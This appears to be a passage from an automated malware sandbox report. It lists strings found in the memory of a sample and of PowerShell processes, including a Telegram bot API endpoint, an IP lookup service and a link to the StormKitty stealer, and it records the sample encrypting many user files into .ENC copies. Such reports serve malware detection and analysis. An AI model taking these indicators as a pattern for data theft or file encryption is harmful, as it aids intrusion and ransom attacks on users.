                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1379374905.000002AE870C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A141000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1379374905.000002AE872E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.0000000003316000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                            Source: attzwu.exe, 0000001B.00000002.2713604809.00000000034D6000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                            Source: powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.avantlink.com/click.php?tt=cl&mi=22069&pw=220733&ctc=WF1605696&url=http%3A%2F%2Fwww.campm
                            Source: powershell.exe, 0000000E.00000002.1666642127.00000292F0A81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1659452425.00000292F0975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                            Source: powershell.exe, 0000000B.00000002.1511031489.0000027A707D2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1508292291.0000027A704D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1857257953.0000023732847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                            Source: powershell.exe, 00000010.00000002.1853345073.0000023732650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co#
                            Source: powershell.exe, 00000008.00000002.1379374905.000002AE870C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000000.2540965621.0000000000E22000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://api.ip.sb/ip
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.retailmenot.com/security/public/out/3RWA3MREY5DRNIWOCMG7AH4FOY?marketingcampaign=3RWA3MR
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.retailmenot.com/security/public/out/5V4O3ZVBGJBZLEJTSCCWGL5B4Y?marketingcampaign=5V4O3ZV
                            Source: spoolsv.exeString found in binary or memory: https://api.telegram.org/bot
                            Source: powershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://coupons.cnn.com/clickout/out/id/838167?clientId=9c766146171622a44dae80b897648eac&clientType=
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                            Source: powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: spoolsv.exe, 00000000.00000002.4039746911.00000000133E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1395489278.000002AE97135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1487580375.0000027A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1630052874.0000029290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slickdeals.net/?cno=6959959&sdtrk=bing
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slickdeals.net/?cno=6959968&sdtrk=bing
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.savings.com/m/p/32073281/12104416/c?afsrc=1&up=2022-10-24-16-43&auto_show_edge_shopping_
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49830 version: TLS 1.2

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Writes many files with high entropy
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.ENC entropy: 7.99208950167Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.ENC entropy: 7.99788629078Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\topTraffic_638004170464094982.ENC entropy: 7.99957270027Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.ENC entropy: 7.99989006046Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.ENC entropy: 7.99983055074Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.ENC entropy: 7.99996738126Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.ENC entropy: 7.99946843906Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb.ENC entropy: 7.99676527184Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb.ENC entropy: 7.99467567175Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb.ENC entropy: 7.99864354323Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb.ENC entropy: 7.99834027313Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml.ENC entropy: 7.9938244232Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml.ENC entropy: 7.99026661554Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb.ENC entropy: 7.9983246519Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb.ENC entropy: 7.99590370144Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb.ENC entropy: 7.99714593568Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb.ENC entropy: 7.99148845005Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb.ENC entropy: 7.99434033437Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hu.hyb.ENC entropy: 7.99945254108Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb.ENC entropy: 7.99889679239Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb.ENC entropy: 7.99889768267Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.ENC entropy: 7.99995775932Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store.ENC entropy: 7.99990713948Jump to dropped file
